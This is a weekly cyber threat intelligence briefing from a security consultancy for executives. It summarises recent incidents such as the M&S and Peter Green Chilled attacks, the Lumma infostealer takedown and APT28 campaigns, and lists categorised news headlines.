Over 70 Malicious npm and VS Code Packages Found Stealing Data and Crypto
Hackers increasingly target UEFI and bootloaders | Cybernews
Don't click on that Facebook ad for a text-to-AI-video tool • The Register
GitHub becomes go-to platform for malware delivery across Europe - Help Net Security
New AyySSHush botnet compromised over 9,000 ASUS routers, adding a persistent SSH backdoor.
Chinese APT41 Exploits Google Calendar for Malware Command-and-Control Operations
Latrodectus malware detected on over 44K IPs | Cybernews
PumaBot Targets Linux Devices in Botnet Campaign
From Infection to Access: A 24-Hour Timeline of a Modern Stealer Campaign
$24 Mln In Cryptocurrency Seized From Russian Malware Network
New Self-Spreading Malware Infects Docker Containers to Mine Dero Cryptocurrency
Bots/Botnets
New AyySSHush botnet compromised over 9,000 ASUS routers, adding a persistent SSH backdoor.
PumaBot Targets Linux Devices in Botnet Campaign
Mobile
Apple Blocks $9 Billion in Fraud Over 5 Years Amid Rising App Store Threats
If You Get This Message On Your Phone It’s An Attack
Internet of Things – IoT
PumaBot Targets Linux Devices in Botnet Campaign
States Have a TP-Link Problem - The National Interest
Data Breaches/Leaks
ConnectWise Hit by Cyber Attack; Nation-State Actor Suspected in Targeted Breach
NHS trusts in London and Southampton hit by cyber attack
Coinbase and TaskUs hack: How it happened | Fortune Crypto
Hackers claim major French govt email data breach | Cybernews
Adidas Falls Victim to Third-Party Data Breach
Luxury jet company allegedly faces data breach | Cybernews
Organised Crime & Criminal Actors
Cyber crime much bigger than nation-state ops: Daniel • The Register
Any teenager can be a cyber attacker now, parents warned
Russian Government Hackers Caught Buying Passwords from Cyber Criminals - SecurityWeek
$24 Mln In Cryptocurrency Seized From Russian Malware Network
US sanctions firm linked to cyber scams behind $200 million in losses
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Coinbase and TaskUs hack: How it happened | Fortune Crypto
Over 70 Malicious npm and VS Code Packages Found Stealing Data and Crypto
Crypto Drainers are Targeting Cryptocurrency Users - Security Boulevard
Hacker steals $223 million in Cetus Protocol cryptocurrency heist
Dark Partners cyber crime gang fuels large-scale crypto heists
$24 Mln In Cryptocurrency Seized From Russian Malware Network
Insider Risk and Insider Threats
In cyber attacks, humans can be the weakest link
Why layoffs increase cyber security risks - Help Net Security
US intelligence agency employee charged with espionage | AP News
Insurance
Cyber Attack Surge Benefits Insurers, Prompts Rethink on Premiums
Cyber now the top reputational risk for global firms, WTW report finds | Global Reinsurance
What UK retail breaches mean for the global cyber insurance market | Insurance Business America
Supply Chain and Third Parties
DragonForce used MSP's RMM software to distribute ransomware • The Register
ConnectWise Hit by Cyber Attack; Nation-State Actor Suspected in Targeted Breach
UK: Two NHS trusts hit by cyber attack that exploited Ivanti flaw – DataBreaches.Net
Firms Eye Vulnerabilities as Enterprise Cyber Security Risks Surge
4.5% of breaches now extend to fourth parties - Help Net Security
'Everest Group' Extorts Global Orgs via SAP's HR Tool
Cloud/SaaS
SaaS companies in firing line following Commvault attack • The Register
What Your Traffic Logs Aren't Telling You About Cloud Security - Security Boulevard
AI forces security leaders to rethink hybrid cloud strategies - Help Net Security
Outages
SentinelOne back online after lengthy outage • The Register
Encryption
Experts "deeply concerned" by the EU plan to weaken encryption | TechRadar
Quantum Computing Threat to Cryptography
Linux and Open Source
PumaBot Targets Linux Devices in Botnet Campaign
Passwords, Credential Stuffing & Brute Force Attacks
Russian Government Hackers Caught Buying Passwords from Cyber Criminals - SecurityWeek
Social Media
TikTok fans beware - experts warn dangerous malware spread by AI fake videos | TechRadar
Don't click on that Facebook ad for a text-to-AI-video tool • The Register
Oversharing online? 5 ways it makes you an easy target for cyber criminals | ZDNET
Meta Disrupts Influence Ops Targeting Romania, Azerbaijan, and Taiwan with Fake Personas
What to do if your Facebook account has been phished, hacked, stolen
Regulations, Fines and Legislation
Cyber defence cuts could sap US response to China hacks, insiders say | World | postguam.com
Major conference in San Antonio shelved due to US policy climate
Banks Want SEC to Rescind Cyber Attack Disclosure Requirements
US Government Launches Audit of NIST’s National Vulnerability Database - Infosecurity Magazine
Models, Frameworks and Standards
How FedRAMP Reciprocity Works with Other Frameworks - Security Boulevard
Careers, Working in Cyber and Information Security
Armed forces charity steps in to address cyber mental health crisis | Computer Weekly
Christian Timbers: Cyber Security Executive Pay Up 4.3% in 2025
Cyber Security salaries in 2025: Shifting priorities, rising demand for specialized roles | SC Media
Law Enforcement Action and Take Downs
Latrodectus malware detected on over 44K IPs | Cybernews
UK, US Police Target Ransomware Gangs In Latest Action | Silicon
Grandpa-conning crook jailed over sugar-coated drug scam • The Register
Misinformation, Disinformation and Propaganda
Meta Disrupts Influence Ops Targeting Romania, Azerbaijan, and Taiwan with Fake Personas
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
UK Government invests £1bn to equip the army for cyber war, defence secretary reveals
US intelligence agency employee charged with espionage | AP News
Britain’s new defence pact with the EU
Nation State Actors
Cyber crime much bigger than nation-state ops: Daniel • The Register
Midyear Roundup: Nation-State Cyber Threats in 2025
ConnectWise Hit by Cyber Attack; Nation-State Actor Suspected in Targeted Breach
US intelligence agency employee charged with espionage | AP News
China
China-linked APT UNC5221 started exploiting Ivanti EPMM flaws shortly after their disclosure
China hacks show they're 'preparing for war': McMaster • The Register
States Have a TP-Link Problem - The National Interest
Chinese APT41 Exploits Google Calendar for Malware Command-and-Control Operations
Chinese Spies Exploit Ivanti Vulnerabilities Against Critical Sectors - SecurityWeek
Prague blames Beijing for cyber attack on foreign ministry
Chinese Hacking Group 'Earth Lamia' Targets Multiple Industries - SecurityWeek
Cyber defence cuts could sap US response to China hacks, insiders say | World | postguam.com
China, Taiwan trade accusations over cyber attacks | Reuters
Russia
Russian Government Hackers Caught Buying Passwords from Cyber Criminals - SecurityWeek
New Russian state-sponsored APT quickly gains global reach, hitting expansive targets | CyberScoop
New Russian State Hacking Group Hits Europe and North America - Infosecurity Magazine
NCSC pins ‘malicious campaign’ of cyber attacks on Russian military intelligence – PublicTechnology
$24 Mln In Cryptocurrency Seized From Russian Malware Network
Electricity supply emerges as prime cyber attack target – German security agency | Clean Energy Wire
'Kisses from Prague': The fall of a Russian ransomware giant
Russia-Linked Hackers Target Tajikistan Government with Weaponized Word Documents
Russia sentences programmer to 14 years for treason • The Register
Iran
85 Iranian cyber attacks linked to killing plots foiled in 2025, Israel says | Iran International
North Korea
How well do you know your remote IT worker? - Help Net Security
Tools and Controls
DragonForce used MSP's RMM software to distribute ransomware • The Register
ConnectWise Hit by Cyber Attack; Nation-State Actor Suspected in Targeted Breach
Cyber Attack Surge Benefits Insurers, Prompts Rethink on Premiums
Why layoffs increase cyber security risks - Help Net Security
The Hidden Cyber Risks in Your Executive Team’s Digital Footprint - Security Boulevard
Welcome to the age of cyber insecurity in business
US, allies push for immediate SIEM, SOAR implementation | SC Media
Why Cyber Security Is Shifting From Detection To Performance
What is OSINT and why it is so important to fight cyber criminals? | TechRadar
SaaS companies in firing line following Commvault attack • The Register
'Everest Group' Extorts Global Orgs via SAP's HR Tool
Ransomware, Rewritten: How AI Is Fueling Both Sides of the Fight | MSSP Alert
The edge devices security risk: What leaders can do | IT Pro
Less than eight percent of top domains implement the toughest DMARC protection
AI Beats 90% of Human Teams in a Hacking Competition
Why data provenance must anchor every CISO’s AI governance strategy - Help Net Security
Recent Acquisitions Illustrate Consolidation Trends in Cyber Security | MSSP Alert
CISA's New SIEM Guidance Tackles Visibility and Blind Spots
‘Secure email’: A losing battle CISOs must give up | CSO Online
Incident Response Planning - Preparing for Data Breaches
Explaining What’s Happened in a Cyber Attack Is Challenging
Predictive Cyber Risk Analysis Using Aggregated Threat Intelligence
Building resilient cyber threat intelligence communities | Computer Weekly
SentinelOne back online after lengthy outage • The Register
What Your Traffic Logs Aren't Telling You About Cloud Security - Security Boulevard
AI forces security leaders to rethink hybrid cloud strategies - Help Net Security
Hackers claim major French govt email data breach | Cybernews
This National Guard unit went analog to simulate a cyber attack
Cyber security challenges could pave the way to a unified approach
Other News
Electricity supply emerges as prime cyber attack target – German security agency | Clean Energy Wire
Britain’s new defence pact with the EU
Why pilots fear that airplanes will be the next target of cyber hackers
The US Is Building a One-Stop Shop for Buying Your Data | WIRED
94 billion browser cookies sold on Telegram | Cybernews
The Cyber Security Catch That Comes With Free Public Wi-Fi
Banks report growing number of cyber attacks against clients | Radio Prague International
This National Guard unit went analog to simulate a cyber attack
Japan to draw up new cyber security strategy by year-end - Japan Today
Cyber security in mining: protecting infrastructure and digital assets | A&O Shearman - JDSupra
Airplane crash-detection systems could be vulnerable | The Week
Vulnerability Management
China-linked APT UNC5221 started exploiting Ivanti EPMM flaws shortly after their disclosure
Not Every CVE Deserves a Fire Drill: Focus on What’s Exploitable
CVE Uncertainty Underlines Importance of Cyber Resilience
Firms Eye Vulnerabilities as Enterprise Cyber Security Risks Surge
Hackers increasingly target UEFI and bootloaders | Cybernews
NIST Launches Metric to Measure Likelihood of Vulnerability Exploits - Infosecurity Magazine
New Attack Bypasses HTTP/2 Security for Arbitrary Cross-Site Scripting
Microsoft wants Windows Update to handle all apps | The Verge
Vulnerabilities
China-linked APT UNC5221 started exploiting Ivanti EPMM flaws shortly after their disclosure
ConnectWise Confirms Hack, “Very Small Number” of Customers Affected - Infosecurity Magazine
Questions mount as Ivanti tackles another round of zero-days | CyberScoop
SaaS companies in firing line following Commvault attack • The Register
Chinese Spies Exploit Ivanti Vulnerabilities Against Critical Sectors - SecurityWeek
UK: Two NHS trusts hit by cyber attack that exploited Ivanti flaw – DataBreaches.Net
Thousands of Asus routers are being hit with stealthy, persistent backdoors - Ars Technica
Cisco security flaw exploited to build botnet of thousands of devices | TechRadar
Chrome 137, Firefox 139 Patch High-Severity Vulnerabilities - SecurityWeek
Over 100,000 WordPress Sites at Risk from Critical CVSS 10.0 Vulnerability in Wishlist Plugin
Apple Safari exposes users to fullscreen browser-in-the-middle attacks
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 23 May 2025
Black Arrow Cyber Threat Intelligence Briefing 25 May 2025:
-M&S IT Contractor ‘Investigating Whether It Was Gateway for Cyber Attack’; M&S Chief Executive Faces £1.1M Pay Hit
-Ransomware Attack on Food Distributor Spells More Pain for UK Supermarkets
-Businesses Ignore Advice on Preventing Cyber Attacks, Says GCHQ
-Executive Complacency Is the Most Dangerous Cyber Threat Today, Warns Insurance VP
-Cyber Security Now HSBC’s Largest Operational Cost
-Best Practices for Board-Level Cyber Security Oversight
-The Importance of Culture in an Effective Cyber Security Programme
-You Do a Fire Drill, so Do a Cyber Attack Drill
-Many Rush into GenAI Deployments, Frequently Without a Security Net
-SMBs Remain Easy Pickings for Cyber Criminals – Here’s Why
-Your Information Was Probably Stolen Again: Researcher Discovers 184 Million Stolen Logins
-Lumma Infostealer Infected About 10 Million Systems Before Global Disruption
-Russia-Linked APT28 Targets Western Logistics Entities and Technology Firms
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities and cyber-related news from the last week.
Executive Summary
The unfolding story of the recent incidents at the UK retailer Marks & Spencer (M&S) and others gives us insights into the risks faced by organisations in all sectors and locations. It is reported that M&S’ outsourced IT provider is conducting an internal investigation to establish if it was the main cause of the incident which has caused significant harm to the retailer. The Chief Executive of M&S is reported to be facing a loss of £1.1m in remuneration due to the attack, while the UK’s data protection authority is investigating the loss of personal information during the incident.
These factors of supply chain risks, regulatory investigations, and personal losses of senior leadership, remind us of the need for all organisations to properly understand and manage their risks. The newly reported attack on food distributor Peter Green Chilled further highlights the need for robust due diligence and embedding cyber security requirements in supplier relationships.
Our review of threat intelligence highlights that despite long-standing guidance, many organisations still fail to act on basic protections. Regulators and insurers alike are now focusing more heavily on board-level accountability and cultural readiness, rather than purely technical defences. From conducting cyber attack drills to strengthening oversight structures, effective governance must be proactive, not reactive. HSBC’s admission that cyber security is now its single largest operational cost underscores just how strategic this issue has become.
Finally, the rise of infostealer malware, generative AI risks, and nation-state espionage campaigns such as APT28 are expanding the threat landscape. Black Arrow urges executives to conduct an impartial cyber risk assessment of their organisation, including their supply chain, and to ensure that this analysis and the resulting cyber security strategy are governed as part of the business-wide risk management.
Top Cyber Stories of the Last Week
M&S IT Contractor ‘Investigating Whether It Was Gateway for Cyber Attack’; M&S Chief Executive Faces £1.1M Pay Hit
Tata Consultancy Services is investigating whether it was the entry point for a recent cyber attack on UK retailer Marks and Spencer (M&S), which has forced the shutdown of M&S’ online clothing business for over three weeks. The breach resulted in customer data being stolen, wiped more than £750m off M&S’s market value, and could cost up to £300m in operating profit. M&S Chief Executive Stuart Machin faces a potential £1.1m loss in deferred bonuses and share-based incentives. M&S attributed the incident to human error at a third-party supplier. The UK’s data protection authority (ICO) is now assessing accountability, with potential fines of up to £17.5m. The case highlights growing concerns over third-party risks and the broader vulnerability of IT outsourcing partnerships to increasingly organised cyber crime.
https://www.ft.com/content/c658645d-289d-49ee-bc1d-241c651516b0
https://www.ft.com/content/43531d25-4f7a-4d6e-b809-e85bb8f0033e
Ransomware Attack on Food Distributor Spells More Pain for UK Supermarkets
A ransomware attack on UK chilled food distributor Peter Green Chilled has disrupted deliveries to major UK supermarkets, with fresh produce left in limbo and small businesses facing losses of up to £100,000. While transport operations continue, order processing was halted, and communication channels remain limited. The incident underscores the growing threat to supply chain resilience, as cyber criminals increasingly target operational systems to inflict maximum disruption. Experts warn that these attacks are no longer just data breaches but full-blown operational crises, with widespread financial and societal consequences, making investment in cyber resilience critical for the retail sector and its partners.
https://www.theregister.com/2025/05/20/ransomware_attack_on_food_distributor/
Businesses Ignore Advice on Preventing Cyber Attacks, Says GCHQ
Despite years of guidance, the UK GCHQ’s National Cyber Security Centre warns that British organisations are still failing to act on freely available cyber security advice. Recent attacks on major retailers and government bodies have highlighted a growing gap between escalating risks and national readiness. Leaders are being urged to take immediate action, as regulatory pressure mounts through a proposed Cyber Resilience Bill aiming to improve supply chain security and grant stronger enforcement powers.
Executive Complacency Is the Most Dangerous Cyber Threat Today, Warns Insurance VP
Executive complacency is emerging as one of the most critical cyber security threats facing organisations today. While insurance and outsourced services can help, they do not absolve leadership of responsibility. Businesses that suffer a cyber attack may face not only operational downtime but also severe reputational damage, which can erode customer trust and long-term viability. Increasingly, insurers are expanding cover to address risks from non-technology vendors and reputational harm, but only where financial loss can be clearly demonstrated. Experts urge board-level engagement and regular risk assessments, with many tools now available to support benchmarking and proactive cyber resilience planning.
Cyber Security Now HSBC’s Largest Operational Cost
HSBC UK has confirmed that cyber security is now its largest operational expense, with hundreds of millions of pounds spent annually to defend against constant digital threats. The bank’s CEO highlighted that attacks are relentless, with over 1,000 transactions processed every second and around 8,000 IT changes made weekly. As customers increasingly rely on digital services, resilience and rapid recovery are critical. This comes as scrutiny intensifies across the financial sector, following widespread service outages and incidents linked to third-party software failures affecting major UK banks.
Best Practices for Board-Level Cyber Security Oversight
Corporate boards are under growing regulatory and operational pressure to strengthen their cyber security oversight. New US disclosure rules now require public companies to outline board-level governance, including how often cyber risks are reviewed, how incidents are reported, and how security is embedded into wider business strategy. Best practice calls for boards to maintain a dedicated oversight structure, meet with the CISO quarterly, and integrate cyber resilience into enterprise risk management. Regular briefings, external expertise, and realistic incident response protocols are essential to ensure accountability, reduce exposure, and support informed, agile decision-making in a dynamic threat landscape.
https://www.techtarget.com/searchsecurity/tip/Best-practices-for-board-level-cybersecurity-oversight
The Importance of Culture in an Effective Cyber Security Programme
A strong cyber security culture is as vital as technical controls in protecting an organisation. Success hinges on leadership fostering a security-first mindset, where all employees understand their role in safeguarding information. Open communication, regular training, and a non-punitive approach to incident reporting create an environment of shared responsibility. When security is embedded into daily operations and visibly supported by leadership, organisations are better equipped to respond to threats and reduce risk. As threats evolve, this cultural foundation enhances resilience and ensures that cyber security remains a collective and continuous priority across the business.
https://www.jdsupra.com/legalnews/the-importance-of-culture-in-an-8005006/
You Do a Fire Drill, so Do a Cyber Attack Drill
Recent cyber attacks on major British retailers have underscored that cyber security is not a luxury but a necessity for all businesses. The disruption caused has ranged from operational paralysis to reputational harm, with some customers even left without basic services. A key takeaway is that strong technology alone is not enough: cultural preparedness and leadership involvement are critical. Just as businesses conduct fire drills, cyber attack simulations should be standard practice. Organisations that fail to plan for continuity, train key personnel, and embed cyber security into contracts and culture risk serious legal, financial, and operational consequences.
https://www.scotsman.com/business/you-do-a-fire-drill-so-do-a-cyber-attack-drill-5137321
Many Rush into GenAI Deployments, Frequently Without a Security Net
Thales research shows that 70% of organisations now rank the rapid growth of generative AI (GenAI) as their top security concern, with many moving ahead before fully securing their environments. A third are already operationalising GenAI, often without a clear understanding of how it integrates with existing systems. Despite this, 73% are actively investing in AI-specific defences, including tools from cloud providers and emerging vendors. GenAI security has become the second-highest priority after cloud security. At the same time, organisations remain alert to evolving risks, including phishing and post-quantum threats, yet many are still lagging in implementing robust countermeasures.
https://www.helpnetsecurity.com/2025/05/22/genai-adoption-security-concern/
SMBs Remain Easy Pickings for Cyber Criminals – Here’s Why
Research shows that over half of UK businesses have suffered a cyber attack in the past five years, with small and medium-sized businesses (SMBs) particularly at risk due to limited budgets, overworked IT teams, and lack of staff training. These weaknesses have led to an estimated £3.4 billion in annual losses for UK SMBs alone. As cyber threats become more advanced, fuelled by artificial intelligence and accessible criminal tools like ransomware-as-a-service, organisations must invest in basic protections, clear policies, and realistic staff training. Without this, the average cost of a breach could escalate alongside reputational and operational damage.
https://www.techradar.com/pro/smbs-remain-easy-pickings-for-cybercriminals-heres-why
Your Information Was Probably Stolen Again: Researcher Discovers 184 Million Stolen Logins
A security researcher has uncovered a publicly exposed database containing over 184 million stolen login credentials from major platforms including Microsoft, Google and PayPal. The 47GB trove, believed to be collected via infostealer malware, included plaintext usernames, passwords and sensitive terms such as "bank" and "wallet", significantly raising the risk of financial fraud. Among the records were over 220 government email addresses spanning 29 countries, signalling potential national security implications. The incident highlights the ongoing threat posed by data harvested through phishing and malicious downloads, and underscores the critical importance of strong passwords, two-factor authentication and continuous monitoring.
Lumma Infostealer Infected About 10 Million Systems Before Global Disruption
LummaC2, a leading malware-as-a-service platform, infected approximately 10 million systems worldwide before a coordinated international takedown disrupted its operations. Used by cyber criminals to harvest sensitive data, including login credentials, financial information, and browser-stored details, the malware is linked to over $36 million in credit card theft in 2023 alone. Victims ranged from individuals to Fortune 500 companies across sectors such as healthcare, finance, and education. Although the group’s infrastructure has been dismantled, authorities warn that the threat may re-emerge, highlighting the ongoing need for vigilance and cross-sector collaboration to protect against sophisticated data theft operations.
https://cyberscoop.com/lumma-infostealer-widespread-victims/
Russia-Linked APT28 Targets Western Logistics Entities and Technology Firms
The US Cybersecurity and Infrastructure Security Agency (CISA) has warned that a Russian state-sponsored group, APT28, is actively targeting Western logistics and technology firms supporting aid to Ukraine, posing a growing threat to NATO-aligned supply chains. Since 2022, organisations across 13 countries have been compromised, including those in defence, rail, and maritime sectors. The attackers used a mix of phishing, brute-force attacks, and exploitation of known software flaws to access systems, steal credentials, and exfiltrate sensitive shipment and personnel data. The campaign also leveraged live IP camera feeds near Ukraine’s borders. Authorities expect this espionage-focused activity to persist.
Governance, Risk and Compliance
Businesses ignore advice on preventing cyber attacks, says GCHQ
Jump in cyber attacks should put businesses on high alert | Computer Weekly
You do a fire drill, so do a cyber attack drill
Best practices for board-level cyber security oversight | TechTarget
Cyber attack threat keeps me awake at night, bank boss says - BBC News
Cyber Security now HSBC's largest operational cost | Mortgage Introducer
The Hidden Cyber Security Risks of M&A
The Importance of Culture in an Effective Cyber Security Program | Ankura - JDSupra
Threats
Ransomware, Extortion and Destructive Attacks
What we know about DragonForce ransomware • The Register
Scattered Spider snared financial orgs before retail • The Register
Service desks are under attack: What can you do about it?
Scattered Spider's Ties to Russia: Closer Than We Think?
3am Ransomware Adopts Email Bombing, Vishing Combo Attack
Ransomware gangs increasingly use Skitnet post-exploitation malware
LockBit Leaks Reveal Drive to Recruit Ransomware Newbies
Sarcoma Ransomware Unveiled: Anatomy of a Double Extortion Gang
Ransomware Gangs Use Skitnet Malware for Stealthy Data Theft and Remote Access
Ex-NSA listened to Scattered Spider's calls: 'They're good' • The Register
Hackers are spreading fake password manager ransomware via Bing ads | PCWorld
VanHelsing ransomware builder leaked on hacking forum
Growing Number Of Targeted Businesses Paying Cyber Criminals, Survey Shows | Scoop News
New Ransomware Attack Mocking Elon Musk Supporters Using PowerShell to Deploy Payloads
Ransomware Victims
How hackers went undetected for 52 hours to cripple M&S
M&S chief executive faces £1.1mn pay hit after cyber attack
Ransomware strikes UK food distributor in latest retail blow • The Register
What we know about DragonForce ransomware • The Register
Service desks are under attack: What can you do about it?
Marks & Spencer faces $402 million profit hit after cyber attack
Why DragonForce is growing in prominence – with retailer attacks boosting its reputation | IT Pro
Investors and shoppers await clues on fallout from M&S cyber attack | Marks & Spencer | The Guardian
M&S cyber attack has cost £300m so far - and disruption will continue until July
Lawyers eyeing M&S cyber attack slammed as ‘predatory’ | The Grocer
UK businesses 'ignore free advice' to stop cyber attacks, GCHQ warns as M&S still reels... - LBC
M&S and Co-Op: BBC reporter on talking to the hackers - BBC News
'Cyber Siege' BBC documentary explores 'devastating' attack on council five years on - Teesside Live
Sensitive Personal Data Stolen in West Lothian Ransomware Attack - Infosecurity Magazine
Mobile carrier Cellcom confirms cyber attack behind extended outages
Kettering Health hit by system-wide outage after ransomware attack
Arla Foods confirms cyber attack disrupts production, causes delays
Phishing & Email Based Attacks
BERNAMA - Phishing And Online Scams Dominate Global Cyber Crime Landscape - INTERPOL
Polymorphic phishing attacks flood inboxes - Help Net Security
New Phishing Attack Mimic as Zoom Meeting Invites to Steal Login Details
Novel Phishing Attack Combines AES, Poisoned npm Packages
Russian Threat Actor TAG-110 Goes Phishing in Tajikistan
Business Email Compromise (BEC)/Email Account Compromise (EAC)
BERNAMA - Phishing And Online Scams Dominate Global Cyber Crime Landscape - INTERPOL
Other Social Engineering
Service desks are under attack: What can you do about it?
3am Ransomware Adopts Email Bombing, Vishing Combo Attack
AI voice hijacking: How well can you trust your ears? - Help Net Security
How to Win Followers and Scamfluence People | WIRED
Half of Consumers Targeted by Social Media Fraud Ads - Infosecurity Magazine
SIM scammer who helped hijack SEC X account put behind bars • The Register
Hacker Charged for Hijacking SEC Account to Promote Fake Bitcoin News
Fraud, Scams and Financial Crime
BERNAMA - Phishing And Online Scams Dominate Global Cyber Crime Landscape - INTERPOL
‘Free hamper – just pay P&P’: the scam offers targeting your bank details | Scams | The Guardian
How to Win Followers and Scamfluence People | WIRED
Half of Consumers Targeted by Social Media Fraud Ads - Infosecurity Magazine
Artificial Intelligence
Many rush into GenAI deployments, frequently without a security net - Help Net Security
Uncensored AI Tool Raises Cyber Security Alarms - Infosecurity Magazine
Mapping the Future of AI Security - Security Boulevard
Data Security Risk: Analysis of AI Tools Reveals 84% Breached | Security Magazine
AI voice hijacking: How well can you trust your ears? - Help Net Security
How to Win Followers and Scamfluence People | WIRED
Security Threats of Open Source AI Exposed by DeepSeek
Be careful what you share with GenAI tools at work - Help Net Security
Finding the right balance between 'vibe coders' and security - IT Security Guru
GitLab's AI Assistant Opened Devs to Code Theft
Meta plans to train AI on EU user data from May 27 without consent
Irish DPC okays Meta's EU AI training plans • The Register
2FA/MFA
What is Universal 2nd Factor (U2F)? | Definition from TechTarget
Malware
Lumma infostealer infected about 10 million systems before global disruption | CyberScoop
Malware Evasion Techniques - What Defenders Need to Know
100+ Fake Chrome Extensions Found Hijacking Sessions, Stealing Credentials, Injecting Ads
Ransomware Gangs Use Skitnet Malware for Stealthy Data Theft and Remote Access
Novel Phishing Attack Combines AES, Poisoned npm Packages
Data-stealing Chrome extensions impersonate Fortinet, YouTube, VPNs
Fake CAPTCHA Attacks Deploy Infostealers and RATs in a Multistage Payload Chain | Trend Micro (US)
Warning! Malicious Chrome extensions found mimicking legit tools | PCWorld
Feds finger Russian 'Qakbot mastermind', 700k computers hit • The Register
What Is a Computer Virus, Really?
Bots/Botnets
Hackers unleash botnet capable of ‘killing most companies’ | The Independent
Mobile
Phone theft is on the rise - 7 ways to protect your device before it's too late | ZDNET
How to hack a phone: 7 common attack methods explained | CSO Online
O2 UK patches bug leaking mobile user location from call metadata
Say goodbye to passwords: Android’s bold security shift explained - Talk Android
Denial of Service/DoS/DDoS
Internet of Things – IoT
Growing Cyberthreats To The Internet Of Things
Why console makers can legally brick your game console - Ars Technica
Data Breaches/Leaks
Mysterious Database of 184 Million Records Exposes Vast Array of Login Credentials | WIRED
M&S faces multimillion-pound lawsuit over cyber attack data leak - Retail Gazette
M&S’ Slow Recovery From Cyber Attack Puts it at Risk of Lasting Damage
Legal Aid Agency Warns Lawyers, Defendants on Data Breach
Solicitors criticise ‘antiquated’ Legal Aid Agency IT system after cyber attack | The Independent
M&S CEO faces multimillion-pound pay hit after cyber attack - Retail Gazette
Legal Aid cyber attack 'more extensive than originally understood'
M&S cyber attack has cost £300m so far - and disruption will continue until July
Lawyers eyeing M&S cyber attack slammed as ‘predatory’ | The Grocer
Large Retailers Land in Scattered Spider's Ransomware Web
UK businesses 'ignore free advice' to stop cyber attacks, GCHQ warns as M&S still reels... - LBC
More Law Firms Join the Surge of Class Action Lawsuits Against Coinbase in Wake of Cyber Attack
Coinbase confirms insider breach affects 70,000 users • The Register
Cyber attack on Legal Aid Agency exposed ‘significant amount’ of applicant data - LBC
11 Of The Worst Data Breaches In The History Of The Internet
Report: Over 50% of top oil and gas firms hit by data breaches in last 30 days | World Pipelines
Debt Collector Data Breach Affects 200,000 Harbin Clinic Patients - Infosecurity Magazine
Lessons from the M&S cyber attack: how brands can survive digital catastrophe | Creative Boom
Coca-Cola workers' info allegedly stolen by hackers | Cybernews
GitLab's AI Assistant Opened Devs to Code Theft
Organised Crime & Criminal Actors
BERNAMA - Phishing And Online Scams Dominate Global Cyber Crime Landscape - INTERPOL
LockBit Leaks Reveal Drive to Recruit Ransomware Newbies
‘Free hamper – just pay P&P’: the scam offers targeting your bank details | Scams | The Guardian
The cyber criminals are now doing PR | PR Week UK
How to Win Followers and Scamfluence People | WIRED
European Union sanctions Stark Industries for enabling cyber attacks
Attacker Specialization Puts Threat Modeling on Defensive
SIM scammer who helped hijack SEC X account put behind bars • The Register
Hacker Charged for Hijacking SEC Account to Promote Fake Bitcoin News
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Hacker Charged for Hijacking SEC Account to Promote Fake Bitcoin News
Hackers use fake Ledger apps to steal Mac users’ seed phrases
Coinbase confirms insider breach affects 70,000 users • The Register
Identity Security Has an Automation Problem—And It's Bigger Than You Think
Insider Risk and Insider Threats
Coinbase confirms insider breach affects 70,000 users • The Register
Identity Security Has an Automation Problem—And It's Bigger Than You Think
Insurance
UK Retail Cyber Attacks May Drive Up US Insurance Premiums
Supply Chain and Third Parties
UK supermarket distributor suffers ransomware attack - BBC News
Third-party vendors responsible for 41.8% of fintech data breaches, survey claims
NHS England Rolls Out Voluntary Cyber Charter for IT Suppliers
Cloud/SaaS
10 SaaS Security Risks Most Organisations Miss | Grip - Security Boulevard
Outages
Delta’s lawsuit against CrowdStrike given go-ahead • The Register
Mobile carrier Cellcom confirms cyber attack behind extended outages
Identity and Access Management
Exposed Credentials: Powering the Global Cyber Crime Wave
Modern authentication: Why OIDC and SAML are just the start - Security Boulevard
Identity Security Has an Automation Problem—And It's Bigger Than You Think
Encryption
Preparing for the post-quantum era: a CIO's guide to securing the future of encryption | CyberScoop
Governments continue losing efforts to gain backdoor access to secure communications
Passwords, Credential Stuffing & Brute Force Attacks
Mysterious Database of 184 Million Records Exposes Vast Array of Login Credentials | WIRED
Warning — Stealing Windows Passwords Is As Easy As APT 123
Exposed Credentials: Powering the Global Cyber Crime Wave
Social Media
Meta plans to train AI on EU user data from May 27 without consent
Irish DPC okays Meta's EU AI training plans • The Register
Malvertising
Half of Consumers Targeted by Social Media Fraud Ads - Infosecurity Magazine
Hackers are spreading fake password manager ransomware via Bing ads | PCWorld
Regulations, Fines and Legislation
Japan arms itself against foreign cyber attacks with new law
GDPR Changes Risk Undermining its Principles, Civil Society Warns - Infosecurity Magazine
NSA cyber director Luber to retire at month’s end | The Record from Recorded Future News
Governments continue losing efforts to gain backdoor access to secure communications
Japan passed a law allowing preemptive offensive cyber actions
FTC finalizes order requiring GoDaddy to secure hosting services
CVE Disruption Threatens Foundations of Defensive Security
Members vexed by Cyber Command turmoil - Roll Call
Models, Frameworks and Standards
GDPR Changes Risk Undermining its Principles, Civil Society Warns - Infosecurity Magazine
NCC Group Expert Warns UK Firms to Prepare for New Cyber Security Bill - Infosecurity Magazine
Collaboration is key in the Cyber Assessment Framework | UKAuthority
Inside MITRE ATT&CK v17: Smarter defences, sharper threat intel - Help Net Security
